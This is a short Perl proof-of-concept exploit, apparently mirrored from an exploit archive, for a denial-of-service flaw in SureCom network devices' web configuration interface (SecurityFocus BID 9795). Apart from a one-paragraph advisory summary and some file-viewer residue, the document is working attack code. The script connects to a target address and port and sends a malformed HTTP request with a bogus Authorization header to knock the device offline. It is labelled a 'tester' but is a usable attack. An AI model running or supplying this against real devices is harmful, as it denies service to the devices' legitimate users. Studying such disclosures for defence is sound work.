36 lines
No EOL
952 B
Perl
Executable file
36 lines
No EOL
952 B
Perl
Executable file
source: https://www.securityfocus.com/bid/9795/info
|
|
|
|
An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
|
|
use IO::Socket;
|
|
|
|
|
|
# default settings
|
|
|
|
$server = "192.168.0.1";
|
|
$port = "80";
|
|
$http_request = "GET / HTTP/1.1\r\nAuthorization: B 00000000\r\n\r\n";
|
|
|
|
if(@ARGV == 2) {
|
|
|
|
$server = $ARGV[0];
|
|
$port = $ARGV[1];
|
|
|
|
}
|
|
else {
|
|
|
|
print "Usage: ./surecom_tester [address] [port]\n\n";
|
|
print "Using default settings...\n\n";
|
|
|
|
}
|
|
|
|
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server,
|
|
PeerPort=>$port)
|
|
or die "ERROR: can't connect to $server on port $port\n\n";
|
|
print $socket $http_request;
|
|
$http_response = <$socket>;
|
|
print "The server's not vulnerable and replied with " . $http_response .
|
|
"\n"; |